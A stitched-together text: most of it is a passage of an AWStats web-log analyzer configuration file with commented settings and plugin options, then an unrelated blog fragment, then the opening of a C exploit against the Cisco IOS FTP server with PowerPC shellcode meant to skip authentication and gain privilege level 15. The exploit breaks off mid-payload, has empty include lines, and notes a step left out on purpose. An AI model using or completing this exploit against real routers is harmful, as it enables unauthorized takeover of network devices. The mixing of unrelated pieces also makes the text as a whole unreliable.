# Note: Use space between each value. This parameter is or not case sensitive

# depending on URLNotCaseSensitive parameter.

# Note: You can use regular expression values writing value with REGEX[value].

# Change : Effective for new updates only

# Example: "REGEX[marketing_directory] REGEX[office\/.*\.(csv|sxw)$]"

# Default: ""

#

OnlyFiles=""





# Add here a list of kind of url (file extension) that must be counted as

# "Hit only" and not as a "Hit" and "Page/Download". You can set here all

# image extensions as they are hit downloaded that must be counted but they

# are not viewed pages. URLs with such extensions are not included in the TOP

# Pages/URL report.

# Note: If you want to exclude particular URLs from stats (No Pages and no

# Hits reported), you must use SkipFiles parameter.

# Change : Effective for new updates only

# Example: "css js class gif jpg jpeg png bmp ico rss xml swf zip arj rar gz z bz2 wav mp3 wma mpg avi"

# Example: ""

# Default: "css js class gif jpg jpeg png bmp ico rss xml swf"

#

NotPageList="css js class gif jpg jpeg png bmp ico rss xml swf"





# By default, AWStats considers that records found in web log file are

# successful hits if HTTP code returned by server is a valid HTTP code (200

# and 304). Any other code are reported in HTTP status chart.

# Note that HTTP 'control codes', like redirection (302, 305) are not added by

# default in this list as they are not pages seen by a visitor but are

# protocol exchange codes to tell the browser to ask another page. Because

# this other page will be counted and seen with a 200 or 304 code, if you

# add such codes, you will have 2 pages viewed reported for only one in facts.

# Change : Effective for new updates only

# Example: "200 304 302 305"

# Default: "200 304"

#

ValidHTTPCodes="200 304"





# By default, AWStats considers that records found in mail log file are

# successful mail transfers if field that represent return code in analyzed

# log file match values defined by this parameter.

# Change : Effective for new updates only

# Example: "1 250 200"

# Default: "1 250"

#

ValidSMTPCodes="1 250"





# Some web servers on some Operating systems (IIS-Windows) consider that a

# login with same value but different case are the same login. To tell AWStats

# to also consider them as one, set this parameter to 1.

# Change : Effective for new updates only

# Possible values: 0 or 1

# Default: 0

#

AuthenticatedUsersNotCaseSensitive=0





# Some web servers on some Operating systems (IIS-Windows) considers that two

# URLs with same value but different case are the same URL. To tell AWStats to

# also considers them as one, set this parameter to 1.

# Change : Effective for new updates only

# Possible values: 0 or 1

# Default: 0

#

URLNotCaseSensitive=0





# Keep or remove the anchor string you can find in some URLs.

# Change : Effective for new updates only

# Possible values: 0 or 1

# Default: 0

#

URLWithAnchor=0





# In URL links, "?" char is used to add parameter's list in URLs. Syntax is:

# /mypage.html?param1=value1¶m2=value2

# However, some servers/sites use also other chars to isolate dynamic part of

# their URLs. You can complete this list with all such characters.

# Change : Effective for new updates only

# Example: "?;,"

# Default: "?;"

#

URLQuerySeparators="?;"





# Keep or remove the query string to the URL in the statistics for individual

# pages. This is primarily used to differentiate between the URLs of dynamic

# pages. If set to 1, mypage.html?id=x and mypage.html?id=y are counted as two

# different pages.

# Warning, when set to 1, memory required to run AWStats is dramatically

# increased if you have a lot of changing URLs (for example URLs with a random

# id inside). Such web sites should not set this option to 1 or use seriously

# the next parameter URLWithQueryWithOnlyFollowingParameters (or eventually

# URLWithQueryWithoutFollowingParameters).

# Change : Effective for new updates only

# Possible values:

# 0 - URLs are cleaned from the query string (ie: "/mypage.html")

# 1 - Full URL with query string is used (ie: "/mypage.html?p=x&q=y")

# Default: 0

#

URLWithQuery=0





# When URLWithQuery is on, you will get the full URL with all parameters in

# URL reports. But among thoose parameters, sometimes you don't need a

# particular parameter because it does not identify the page or because it's

# a random ID changing for each access even if URL points to same page. In

# such cases, it is higly recommanded to ask AWStats to keep only parameters

# you need (if you know them) before counting, manipulating and storing URL.

# Enter here list of wanted parameters. For example, with "param", one hit on

# /mypage.cgi?param=abc&id=Yo4UomP9d and /mypage.cgi?param=abc&id=Mu8fdxl3r

# will be reported as 2 hits on /mypage.cgi?param=abc

# This parameter is not used when URLWithQuery is 0 and can't be used with

# URLWithQueryWithoutFollowingParameters.

# Change : Effective for new updates only

# Example: "param"

# Default: ""

#

URLWithQueryWithOnlyFollowingParameters=""





# When URLWithQuery is on, you will get the full URL with all parameters in

# URL reports. But among thoose parameters, sometimes you don't need a

# particular parameter because it does not identify the page or because it's

# a random ID changing for each access even if URL points to same page. In

# such cases, it is higly recommanded to ask AWStats to remove such parameters

# from the URL before counting, manipulating and storing URL. Enter here list

# of all non wanted parameters. For example if you enter "id", one hit on

# /mypage.cgi?param=abc&id=Yo4UomP9d and /mypage.cgi?param=abc&id=Mu8fdxl3r

# will be reported as 2 hits on /mypage.cgi?param=abc

# This parameter is not used when URLWithQuery is 0 and can't be used with

# URLWithQueryWithOnlyFollowingParameters.

# Change : Effective for new updates only

# Example: "PHPSESSID jsessionid"

# Default: ""

#

URLWithQueryWithoutFollowingParameters=""





# Keep or remove the query string to the referrer URL in the statistics for

# external referrer pages. This is used to differentiate between the URLs of

# dynamic referrer pages. If set to 1, mypage.html?id=x and mypage.html?id=y

# are counted as two different referrer pages.

# Change : Effective for new updates only

# Possible values:

# 0 - Referrer URLs are cleaned from the query string (ie: "/mypage.html")

# 1 - Full URL with query string is used (ie: "/mypage.html?p=x&q=y")

# Default: 0

#

URLReferrerWithQuery=0





# AWStats can detect setup problems or show you important informations to have

# a better use. Keep this to 1, except if AWStats says you can change it.

# Change : Effective immediatly

# Possible values: 0 or 1

# Default: 1

#

WarningMessages=1





# When an error occurs, AWStats outputs a message related to errors. If you

# want (in most cases for security reasons) to have no error messages, you

# can set this parameter to your personalized generic message.

# Change : Effective immediatly

# Example: "An error occurred. Contact your Administrator"

# Default: ""

#

ErrorMessages=""





# AWStat can be run with debug=x parameter to output various informations

# to help in debugging or solving troubles. If you want to allow this (not

# enabled by default for security reasons), set this parameter to 0.

# Change : Effective immediatly

# Possible values: 0 or 1

# Default: 0

#

DebugMessages=0





# To help you to detect if your log format is good, AWStats reports an error

# if all the first NbOfLinesForCorruptedLog lines have a format that does not

# match the LogFormat parameter.

# However, some worm virus attack on your web server can result in a very high

# number of corrupted lines in your log. So if you experience awstats stop

# because of bad virus records at the beginning of your log file, you can

# increase this parameter (very rare).

# Change : Effective for new updates only

# Default: 50

#

NbOfLinesForCorruptedLog=50





# For some particular integration needs, you may want to have CGI links to

# point to another script than awstats.pl.

# Use the name of this script in WrapperScript parameter.

# Change : Effective immediatly

# Example: "awstatslauncher.pl"

# Default: ""

#

WrapperScript=""





# DecodeUA must be set to 1 if you use Roxen web server. This server converts

# all spaces in user agent field into %20. This make the AWStats robots, OS

# and browsers detection fail in some cases. Just change it to 1 if and only

# if your web server is Roxen.

# Change : Effective for new updates only

# Possible values: 0 or 1

# Default: 0

#

DecodeUA=0





# MiscTrackerUrl can be used to make AWStats able to detect some miscellaneous

# things, that can not be tracked on other way, like:

# - Javascript disabled

# - Java enabled

# - Screen size

# - Color depth

# - Macromedia Director plugin

# - Macromedia Shockwave plugin

# - Realplayer G2 plugin

# - QuickTime plugin

# - Mediaplayer plugin

# - Acrobat PDF plugin

# To enable all these features, you must copy the awstats_misc_tracker.js file

# into a /js/ directory stored in your web document root and add the following

# HTML code at the end of your index page (but before :

#

#

#

#

# If code is not added in index page, all those detection capabilities will be

# disabled. You must also check that ShowScreenSizeStats and ShowMiscStats

# parameters are set to 1 to make results appear in AWStats report page.

# If you want to use another directory than /js/, you must also change the

# awstatsmisctrackerurl variable into the awstats_misc_tracker.js file.

# Change : Effective for new updates only.

# Possible value: URL of javascript tracker file added in your HTML code.

# Default: "/js/awstats_misc_tracker.js"

#

MiscTrackerUrl="/js/awstats_misc_tracker.js"







#-----------------------------------------------------------------------------

# OPTIONAL ACCURACY SETUP SECTION (Not required but increase AWStats features)

#-----------------------------------------------------------------------------



# The following values allow you to define accuracy of AWStats entities

# (robots, browsers, os, referers, file types) detection.

# It might be a good idea for large web sites or ISP that provides AWStats to

# high number of customers, to set this parameter to 1 (or 0), instead of 2.

# Possible values:

# 0 = No detection,

# 1 = Medium/Standard detection

# 2 = Full detection

# Change : Effective for new updates only

# Note : LevelForBrowsersDetection can also accept value "allphones". This

# enable detailed detection of phone/pda browsers.

# Default: 2 (0 for LevelForWormsDetection)

#

LevelForBrowsersDetection=2 # 0 disables Browsers detection.

# 2 reduces AWStats speed by 2%

# allphones reduces AWStats speed by 5%

LevelForOSDetection=2 # 0 disables OS detection.

# 2 reduces AWStats speed by 3%

LevelForRefererAnalyze=2 # 0 disables Origin detection.

# 2 reduces AWStats speed by 14%

LevelForRobotsDetection=2 # 0 disables Robots detection.

# 2 reduces AWStats speed by 2.5%

LevelForSearchEnginesDetection=2 # 0 disables Search engines detection.

# 2 reduces AWStats speed by 9%

LevelForKeywordsDetection=2 # 0 disables Keyphrases/Keywords detection.

# 2 reduces AWStats speed by 1%

LevelForFileTypesDetection=2 # 0 disables File types detection.

# 2 reduces AWStats speed by 1%

LevelForWormsDetection=0 # 0 disables Worms detection.

# 2 reduces AWStats speed by 15%







#-----------------------------------------------------------------------------

# OPTIONAL APPEARANCE SETUP SECTION (Not required but increase AWStats features)

#-----------------------------------------------------------------------------



# When you use AWStats as a CGI, you can have the reports shown in HTML frames.

# Frames are only available for report viewed dynamically. When you build

# pages from command line, this option is not used and no frames are built.

# Possible values: 0 or 1

# Default: 1

#

UseFramesWhenCGI=1





# This parameter asks your browser to open detailed reports into a different

# window than the main page.

# Possible values:

# 0 - Open all in same browser window

# 1 - Open detailed reports in another window except if using frames

# 2 - Open always in a different window even if reports are framed

# Default: 1

#

DetailedReportsOnNewWindows=1





# You can add, in the HTML report page, a cache lifetime (in seconds) that

# will be returned to the browser in HTTP header answer by server.

# This parameter is not used when reports are built with -staticlinks option.

# Example: 3600

# Default: 0

#

Expires=0





# To avoid too large web pages, you can ask AWStats to limit number of rows of

# all reported charts to this number when no other limits apply.

# Default: 1000

#

MaxRowsInHTMLOutput=1000





# Set your primary language (ISO-639-1 language codes).

# Possible values:

# Albanian=al, Bosnian=ba, Bulgarian=bg, Catalan=ca,

# Chinese (Taiwan)=tw, Chinese (Simpliefied)=cn, Croatian=hr, Czech=cz,

# Danish=dk, Dutch=nl, English=en, Estonian=et, Euskara=eu, Finnish=fi,

# French=fr, Galician=gl, German=de, Greek=gr, Hebrew=he, Hungarian=hu,

# Icelandic=is, Indonesian=id, Italian=it, Japanese=jp, Korean=ko,

# Latvian=lv, Norwegian (Nynorsk)=nn, Norwegian (Bokmal)=nb, Polish=pl,

# Portuguese=pt, Portuguese (Brazilian)=br, Romanian=ro, Russian=ru,

# Serbian=sr, Slovak=sk, Slovenian=si, Spanish=es, Swedish=se, Turkish=tr,

# Ukrainian=ua, Welsh=cy.

# First available language accepted by browser=auto

# Default: "auto"

#

Lang="auto"





# Set the location of language files.

# Example: "/usr/share/awstats/lang"

# Default: "./lang" (means lang directory is in same location than awstats.pl)

#

DirLang="./lang"





# Show menu header with reports' links

# Possible values: 0 or 1

# Default: 1

#

ShowMenu=1





# You choose here which reports you want to see in the main page and what you

# want to see in those reports.

# Possible values:

# 0 - Report is not shown at all

# 1 - Report is shown in main page with an entry in menu and default columns

# XYZ - Report shows column informations defined by code X,Y,Z...

# X,Y,Z... are code letters among the following:

# U = Unique visitors

# V = Visits

# P = Number of pages

# H = Number of hits (or mails)

# B = Bandwith (or total mail size for mail logs)

# L = Last access date

# E = Entry pages

# X = Exit pages

# C = Web compression (mod_gzip,mod_deflate)

# M = Average mail size (mail logs)

#



# Show monthly summary

# Context: Web, Streaming, Mail, Ftp

# Default: UVPHB, Possible column codes: UVPHB

ShowSummary=UVPHB



# Show monthly chart

# Context: Web, Streaming, Mail, Ftp

# Default: UVPHB, Possible column codes: UVPHB

ShowMonthStats=UVPHB



# Show days of month chart

# Context: Web, Streaming, Mail, Ftp

# Default: VPHB, Possible column codes: VPHB

ShowDaysOfMonthStats=VPHB



# Show days of week chart

# Context: Web, Streaming, Mail, Ftp

# Default: PHB, Possible column codes: PHB

ShowDaysOfWeekStats=PHB



# Show hourly chart

# Context: Web, Streaming, Mail, Ftp

# Default: PHB, Possible column codes: PHB

ShowHoursStats=PHB



# Show domains/country chart

# Context: Web, Streaming, Mail, Ftp

# Default: PHB, Possible column codes: PHB

ShowDomainsStats=PHB



# Show hosts chart

# Context: Web, Streaming, Mail, Ftp

# Default: PHBL, Possible column codes: PHBL

ShowHostsStats=PHBL



# Show authenticated users chart

# Context: Web, Streaming, Ftp

# Default: 0, Possible column codes: PHBL

ShowAuthenticatedUsers=0



# Show robots chart

# Context: Web, Streaming

# Default: HBL, Possible column codes: HBL

ShowRobotsStats=HBL



# Show worms chart

# Context: Web, Streaming

# Default: 0 (If set to other than 0, see also LevelForWormsDetection), Possible column codes: HBL

ShowWormsStats=0



# Show email senders chart (For use when analyzing mail log files)

# Context: Mail

# Default: 0, Possible column codes: HBML

ShowEMailSenders=0



# Show email receivers chart (For use when analyzing mail log files)

# Context: Mail

# Default: 0, Possible column codes: HBML

ShowEMailReceivers=0



# Show session chart

# Context: Web, Streaming, Ftp

# Default: 1, Possible column codes: None

ShowSessionsStats=1



# Show pages-url chart.

# Context: Web, Streaming, Ftp

# Default: PBEX, Possible column codes: PBEX

ShowPagesStats=PBEX



# Show file types chart.

# Context: Web, Streaming, Ftp

# Default: HB, Possible column codes: HBC

ShowFileTypesStats=HB



# Show file size chart (Not yet available)

# Context: Web, Streaming, Mail, Ftp

# Default: 1, Possible column codes: None

ShowFileSizesStats=0



# Show operating systems chart

# Context: Web, Streaming, Ftp

# Default: 1, Possible column codes: None

ShowOSStats=1



# Show browsers chart

# Context: Web, Streaming

# Default: 1, Possible column codes: None

ShowBrowsersStats=1



# Show screen size chart

# Context: Web, Streaming

# Default: 0 (If set to 1, see also MiscTrackerUrl), Possible column codes: None

ShowScreenSizeStats=0



# Show origin chart

# Context: Web, Streaming

# Default: PH, Possible column codes: PH

ShowOriginStats=PH



# Show keyphrases chart

# Context: Web, Streaming

# Default: 1, Possible column codes: None

ShowKeyphrasesStats=1



# Show keywords chart

# Context: Web, Streaming

# Default: 1, Possible column codes: None

ShowKeywordsStats=1



# Show misc chart

# Context: Web, Streaming

# Default: a (See also MiscTrackerUrl parameter), Possible column codes: anjdfrqwp

ShowMiscStats=a



# Show http errors chart

# Context: Web, Streaming

# Default: 1, Possible column codes: None

ShowHTTPErrorsStats=1



# Show smtp errors chart (For use when analyzing mail log files)

# Context: Mail

# Default: 0, Possible column codes: None

ShowSMTPErrorsStats=0



# Show the cluster report (Your LogFormat must contains the %cluster tag)

# Context: Web, Streaming, Ftp

# Default: 0, Possible column codes: PHB

ShowClusterStats=0





# Some graphical reports are followed by the data array of values.

# If you don't want this array (to reduce the report size for example), you

# can set thoose options to 0.

# Possible values: 0 or 1

# Default: 1

#

# Data array values for the ShowMonthStats report

AddDataArrayMonthStats=1

# Data array values for the ShowDaysOfMonthStats report

AddDataArrayShowDaysOfMonthStats=1

# Data array values for the ShowDaysOfWeekStats report

AddDataArrayShowDaysOfWeekStats=1

# Data array values for the ShowHoursStats report

AddDataArrayShowHoursStats=1





# In the Origin chart, you have stats on where your hits came from. You can

# include hits on pages that come from pages of same sites in this chart.

# Possible values: 0 or 1

# Default: 0

#

IncludeInternalLinksInOriginSection=0





# The following parameters can be used to choose the maximum number of lines

# shown for the particular following reports.

#

# Stats by countries/domains

MaxNbOfDomain = 10

MinHitDomain = 1

# Stats by hosts

MaxNbOfHostsShown = 10

MinHitHost = 1

# Stats by authenticated users

MaxNbOfLoginShown = 10

MinHitLogin = 1

# Stats by robots

MaxNbOfRobotShown = 10

MinHitRobot = 1

# Stats by pages

MaxNbOfPageShown = 10

MinHitFile = 1

# Stats by OS

MaxNbOfOsShown = 10

MinHitOs = 1

# Stats by browsers

MaxNbOfBrowsersShown = 10

MinHitBrowser = 1

# Stats by screen size

MaxNbOfScreenSizesShown = 5

MinHitScreenSize = 1

# Stats by window size (following 2 parameters are not yet used)

MaxNbOfWindowSizesShown = 5

MinHitWindowSize = 1

# Stats by referers

MaxNbOfRefererShown = 10

MinHitRefer = 1

# Stats for keyphrases

MaxNbOfKeyphrasesShown = 10

MinHitKeyphrase = 1

# Stats for keywords

MaxNbOfKeywordsShown = 10

MinHitKeyword = 1

# Stats for sender or receiver emails

MaxNbOfEMailsShown = 20

MinHitEMail = 1





# Choose if you want the week report to start on sunday or monday

# Possible values:

# 0 - Week starts on sunday

# 1 - Week starts on monday

# Default: 1

#

FirstDayOfWeek=1





# List of visible flags that link to other language translations.

# See Lang parameter for list of allowed flag/language codes.

# If you don't want any flag link, set ShowFlagLinks to "".

# This parameter is used only if ShowMenu parameter is set to 1.

# Possible values: "" or "language_codes_separated_by_space"

# Example: "en es fr nl de"

# Default: ""

#

ShowFlagLinks=""





# Each URL, shown in stats report views, are links you can click.

# Possible values: 0 or 1

# Default: 1

#

ShowLinksOnUrl=1





# When AWStats builds HTML links in its report pages, it starts those links

# with "http://". However some links might be HTTPS links, so you can enter

# here the root of all your HTTPS links. If all your site is a SSL web site,

# just enter "/".

# This parameter is not used if ShowLinksOnUrl is 0.

# Example: "/shopping"

# Example: "/"

# Default: ""

#

UseHTTPSLinkForUrl=""





# Maximum length of URL part shown on stats page (number of characters).

# This affects only URL visible text, links still work.

# Default: 64

#

MaxLengthOfShownURL=64





# You can enter HTML code that will be added at the top of AWStats reports.

# Default: ""

#

HTMLHeadSection=""





# You can enter HTML code that will be added at the end of AWStats reports.

# Great to add advert ban.

# Default: ""

#

HTMLEndSection=""





# You can set Logo and LogoLink to use your own logo.

# Logo must be the name of image file (must be in $DirIcons/other directory).

# LogoLink is the expected URL when clicking on Logo.

# Default: "awstats_logo6.png"

#

Logo="awstats_logo6.png"

LogoLink="http://awstats.sourceforge.net"





# Value of maximum bar width/height for horizontal/vertical HTML graphics bars.

# Default: 260/90

#

BarWidth = 260

BarHeight = 90





# You can ask AWStats to use a particular CSS (Cascading Style Sheet) to

# change its look. To create a style sheet, you can use samples provided with

# AWStats in wwwroot/css directory.

# Example: "/awstatscss/awstats_bw.css"

# Example: "/css/awstats_bw.css"

# Default: ""

#

StyleSheet=""





# Those color parameters can be used (if StyleSheet parameter is not used)

# to change AWStats look.

# Example: color_name="RRGGBB" # RRGGBB is Red Green Blue components in Hex

#

color_Background="FFFFFF" # Background color for main page (Default = "FFFFFF")

color_TableBGTitle="CCCCDD" # Background color for table title (Default = "CCCCDD")

color_TableTitle="000000" # Table title font color (Default = "000000")

color_TableBG="CCCCDD" # Background color for table (Default = "CCCCDD")

color_TableRowTitle="FFFFFF" # Table row title font color (Default = "FFFFFF")

color_TableBGRowTitle="ECECEC" # Background color for row title (Default = "ECECEC")

color_TableBorder="ECECEC" # Table border color (Default = "ECECEC")

color_text="000000" # Color of text (Default = "000000")

color_textpercent="606060" # Color of text for percent values (Default = "606060")

color_titletext="000000" # Color of text title within colored Title Rows (Default = "000000")

color_weekend="EAEAEA" # Color for week-end days (Default = "EAEAEA")

color_link="0011BB" # Color of HTML links (Default = "0011BB")

color_hover="605040" # Color of HTML on-mouseover links (Default = "605040")

color_u="FFAA66" # Background color for number of unique visitors (Default = "FFAA66")

color_v="F4F090" # Background color for number of visites (Default = "F4F090")

color_p="4477DD" # Background color for number of pages (Default = "4477DD")

color_h="66DDEE" # Background color for number of hits (Default = "66DDEE")

color_k="2EA495" # Background color for number of bytes (Default = "2EA495")

color_s="8888DD" # Background color for number of search (Default = "8888DD")

color_e="CEC2E8" # Background color for number of entry pages (Default = "CEC2E8")

color_x="C1B2E2" # Background color for number of exit pages (Default = "C1B2E2")







#-----------------------------------------------------------------------------

# PLUGINS

#-----------------------------------------------------------------------------



# Add here all plugin files you want to load.

# Plugin files must be .pm files stored in 'plugins' directory.

# Uncomment LoadPlugin lines to enable a plugin after checking that perl

# modules required by the plugin are installed.



# Plugin: Tooltips

# Perl modules required: None

# Add some tooltips help on HTML report pages.

# Note that enabling this kind of help will increased HTML report pages size,

# so server load and bandwidth.

#

#LoadPlugin="tooltips"



# Plugin: DecodeUTFKeys

# Perl modules required: Encode and URI::Escape

# Allow AWStats to show correctly (in language charset) keywords/keyphrases

# strings even if they were UTF8 coded by the referer search engine.

#

#LoadPlugin="decodeutfkeys"



# Plugin: IPv6

# Perl modules required: Net::IP and Net::DNS

# This plugin gives AWStats capability to make reverse DNS lookup on IPv6

# addresses.

# Note: If you are interested in having country report, you should use the

# geoip or geoipfree plugin instead of enabled reverse DNS lookup.

#

#LoadPlugin="ipv6"



# Plugin: HashFiles

# Perl modules required: Storable

# AWStats DNS cache files are read/saved as native hash files. This increases

# DNS cache files loading speed, above all for very large web sites.

#

#LoadPlugin="hashfiles"



# Plugin: GeoIP

# Perl modules required: Geo::IP or Geo::IP::PurePerl (from Maxmind)

# Country chart is built from an Internet IP-Country database.

# This plugin is useless for intranet only log files.

# Note: You must choose between using this plugin (need Perl Geo::IP module

# from Maxmind, database is free and up to date) or the GeoIPfree plugin

# (need Perl Geo::IPfree module, database is free but not up to date).

# There is two versions of Maxmind Country Database:

# You can get a free version or purchase a license from Maxmind to get/use a more

# accurate version including updates (http://www.maxmind.com/app/perl?rId=awstat)

# This plugin reduces AWStats speed of 8% !

#

#LoadPlugin="geoip GEOIP_STANDARD /pathto/GeoIP.dat"



# Plugin: GeoIPfree

# Perl modules required: Geo::IPfree version 0.2+ (from Graciliano M.P.)

# Country chart is built from an Internet IP-Country database.

# This plugin is useless for intranet only log files.

# Note: You must choose between using this plugin (need Perl Geo::IPfree

# module, database is free but not up to date) or the GeoIP plugin (need

# Perl Geo::IP module from Maxmind, database is also free and up to date).

# Note: Activestate provide a corrupted version of Geo::IPfree 0.2 Perl

# module, so install it from elsewhere (from www.cpan.org for example).

# This plugin reduces AWStats speed of 10% !

#

#LoadPlugin="geoipfree"



# Plugin: GeoIP_Region_Maxmind

# Perl modules required: Geo::IP (from Maxmind)

# This plugin add a chart of hits by regions. Only regions for US and

# Canada can be detected.

# Note: This plugin need Maxmind GeoIP Perl module AND the region database.

# Note: I get some problem with Maxmind Geo::IP Perl module with ActiveState

# on Windows but it works great on Linux with default Perl.

# You need to purchase a license from Maxmind to get/use the Region database.

# This plugin reduces AWStats speed.

#

#LoadPlugin="geoip_region_maxmind GEOIP_STANDARD /pathto/GeoIPRegion.dat"



# Plugin: GeoIP_City_Maxmind

# Perl modules required: Geo::IP (from Maxmind)

# This plugin add a chart of hits by cities (with country and regions

# informations for major countries).

# Note: This plugin need Maxmind GeoIP Perl module AND the city database.

# Note: I get some problem with Maxmind Geo::IP Perl module with ActiveState

# on Windows but it works great on Linux with default Perl.

# There is two versions of Maxmind City Database:

# You can get a free version or purchase a license from Maxmind to get/use a more

# accurate version including updates (http://www.maxmind.com/app/perl?rId=awstat)

# This plugin reduces AWStats speed.

#

#LoadPlugin="geoip_city_maxmind GEOIP_STANDARD /pathto/GeoIPCity.dat"



# Plugin: GeoIP_ISP_Maxmind

# Perl modules required: Geo::IP (from Maxmind)

# This plugin add a chart of hits by ISP.

# Note: This plugin need Maxmind GeoIP Perl module AND the ISP database.

# Note: I get some problem with Maxmind Geo::IP Perl module with ActiveState

# on Windows but it works great on Linux with default Perl.

# You need to purchase a license from Maxmind to get/use the ISP database.

# This plugin reduces AWStats speed.

#

#LoadPlugin="geoip_isp_maxmind GEOIP_STANDARD /pathto/GeoIPISP.dat"



# Plugin: GeoIP_Org_Maxmind

# Perl modules required: Geo::IP (from Maxmind)

# This plugin add a chart of hits by Organization name

# Note: This plugin need Maxmind GeoIP Perl module AND the Org database.

# Note: I get some problem with Maxmind Geo::IP Perl module with ActiveState

# on Windows but it works great on Linux with default Perl.

# You need to purchase a license from Maxmind to get/use the Org database.

# This plugin reduces AWStats speed.

#

#LoadPlugin="geoip_org_maxmind GEOIP_STANDARD /pathto/GeoIPOrg.dat"



# Plugin: UserInfo

# Perl modules required: None

# Add a text (Firtname, Lastname, Office Department, ...) in authenticated user

# reports for each login value.

# A text file called userinfo.myconfig.txt, with two fields (first is login,

# second is text to show, separated by a tab char) must be created in DirData

# directory.

#

#LoadPlugin="userinfo"



# Plugin: HostInfo

# Perl modules required: Net::XWhois

# Add a column into host chart with a link to open a popup window that shows

# info on host (like whois records).

#

#LoadPlugin="hostinfo"



# Plugin: ClusterInfo

# Perl modules required: None

# Add a text (for example a full hostname) in cluster reports for each cluster

# number.

# A text file called clusterinfo.myconfig.txt, with two fields (first is

# cluster number, second is text to show) separated by a tab char. must be

# created into DirData directory.

# Note this plugin is useless if ShowClusterStats is set to 0 or if you don't

# use a personalized log format that contains %cluster tag.

#

#LoadPlugin="clusterinfo"



# Plugin: UrlAliases

# Perl modules required: None

# Add a text (Page title, description...) in URL reports before URL value.

# A text file called urlalias.myconfig.txt, with two fields (first is URL,

# second is text to show, separated by a tab char) must be created into

# DirData directory.

#

#LoadPlugin="urlalias"



# Plugin: TimeHiRes

# Perl modules required: Time::HiRes (if Perl < 5.8)

# Time reported by -showsteps option is in millisecond. For debug purpose.

#

#LoadPlugin="timehires"



# Plugin: TimeZone

# Perl modules required: Time::Local

# Allow AWStats to correct a bad timezone for user of some IIS that use

# GMT date in its log instead of local server time.

# This module is useless for Apache and most IIS version.

# This plugin reduces AWStats speed of 40% !!!!!!!

#

#LoadPlugin="timezone +2"



# Plugin: Rawlog

# Perl modules required: None

# This plugin adds a form in AWStats main page to allow users to see raw

# content of current log files. A filter is also available.

#

#LoadPlugin="rawlog"



# Plugin: GraphApplet

# Perl modules required: None

# Supported charts are built by a 3D graphic applet.

#

#LoadPlugin="graphapplet /awstatsclasses" # EXPERIMENTAL FEATURE







#-----------------------------------------------------------------------------

# EXTRA SECTIONS

#-----------------------------------------------------------------------------



# You can define your own charts, you choose here what are rows and columns

# keys. This feature is particularly useful for marketing purpose, tracking

# products orders for example.

# For this, edit all parameters of Extra section. Each set of parameter is a

# different chart. For several charts, duplicate section changing the number.

# Note: Each Extra section reduces AWStats speed by 8%.

#

# WARNING: A wrong setup of Extra section might result in too large arrays

# that will consume all your memory, making AWStats unusable after several

# updates, so be sure to setup it correctly.

# In most cases, you don't need this feature.

#

# ExtraSectionNameX is title of your personalized chart.

# ExtraSectionCodeFilterX is list of codes the record code field must match.

# Put an empty string for no test on code.

# ExtraSectionConditionX are conditions you can use to count or not the hit,

# Use one of the field condition

# (URL,URLWITHQUERY,QUERY_STRING,REFERER,UA,HOSTINLOG,HOST,VHOST,extraX)

# and a regex to match, after a coma. Use "||" for "OR".

# ExtraSectionFirstColumnTitleX is the first column title of the chart.

# ExtraSectionFirstColumnValuesX is a string to tell AWStats which field to

# extract value from

# (URL,URLWITHQUERY,QUERY_STRING,REFERER,UA,HOSTINLOG,HOST,VHOST,extraX)

# and how to extract the value (using regex syntax). Each different value

# found will appear in first column of report on a different row. Be sure

# that list of different possible values will not grow indefinitely.

# ExtraSectionFirstColumnFormatX is the string used to write value.

# ExtraSectionStatTypesX are things you want to count. You can use standard

# code letters (P for pages,H for hits,B for bandwidth,L for last access).

# ExtraSectionAddAverageRowX add a row at bottom of chart with average values.

# ExtraSectionAddSumRowX add a row at bottom of chart with sum values.

# MaxNbOfExtraX is maximum number of rows shown in chart.

# MinHitExtraX is minimum number of hits required to be shown in chart.

#



# Example to report the 20 products the most ordered by "order.cgi" script

#ExtraSectionName1="Product orders"

#ExtraSectionCodeFilter1="200 304"

#ExtraSectionCondition1="URL,\/cgi\-bin\/order\.cgi||URL,\/cgi\-bin\/order2\.cgi"

#ExtraSectionFirstColumnTitle1="Product ID"

#ExtraSectionFirstColumnValues1="QUERY_STRING,productid=([^&]+)"

#ExtraSectionFirstColumnFormat1="%s"

#ExtraSectionStatTypes1=PL

#ExtraSectionAddAverageRow1=0

#ExtraSectionAddSumRow1=1

#MaxNbOfExtra1=20

#MinHitExtra1=1





# There is also a global parameter ExtraTrackedRowsLimit that limits the

# number of possible rows an ExtraSection can report. This parameter is

# here to protect too much memory use when you make a bad setup in your

# ExtraSection. It applies to all ExtraSection independently meaning that

# none ExtraSection can report more rows than value defined by ExtraTrackedRowsLimit.

# If you know an ExtraSection will report more rows than its value, you should

# increase this parameter or AWStats will stop with an error.

# Example: 2000

# Default: 500

#

ExtraTrackedRowsLimit=500





#-----------------------------------------------------------------------------

# INCLUDES

#-----------------------------------------------------------------------------



# You can include other config files using the directive with the name of the

# config file.

# This is particularly useful for users who have a lot of virtual servers, so

# a lot of config files and want to maintain common values in only one file.

# Note that when a variable is defined both in a config file and in an

# included file, AWStats will use the last value read for parameters that

# contains one value and AWStats will concat all values from both files for

# parameters that are lists of values.

#

nb : inget logformat !!!!!!

Wednesday, August 06, 2008

Hari yang tidak cerah .... its Gone Over Now For Me ....

/*

Cisco IOS FTP server remote exploit by Andy Davis 2008

Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007

Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router

Removes the requirement to authenticate and escalates to level 15

*********************************************************************
To protect the innocent a critical step has been omitted, which means
the shellcode will only execute when the router is attached to gdb.
I'm sure the PowerPC shellcoders out there will work it out...
*********************************************************************

Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent
on the original IOS security research

iosftpexploit googlemail 'dot' com

*/

#include
#include
#include
#include





#define PORT 21

int main(int argc, char **argv)
{
unsigned char sendbuf[] =

"MKD "

/* .equ vty_info, 0x8182da60 # pointer to VTY info */
/* .equ terminate, 0x80e4086c # kill a process */

"\x3c\x80\x81\x83" /* lis 4,vty_info@ha */
"\x38\x84\xda\x60" /* la 4,vty_info@l(4) */
"\x7d\x08\x42\x78" /* xor 8,8,8 */
"\x7c\xe4\x40\x2e" /* lwzx 7,4,8 */
"\x91\x07\x01\x74" /* stw 8,372(7) */
"\x39\x08\xff\xff" /* subi 8,8,1 */
"\x38\xe7\x09\x1a" /* addi 7,7,233 */
"\x91\x07\x04\xca" /* stw 8,1226(7) */
"\x7d\x03\x43\x78" /* mr 3,8 */
"\x3c\x80\x80\xe4" /* lis 4,terminate@ha */
"\x38\x84\x08\x6c" /* la 4,terminate@l(4) */
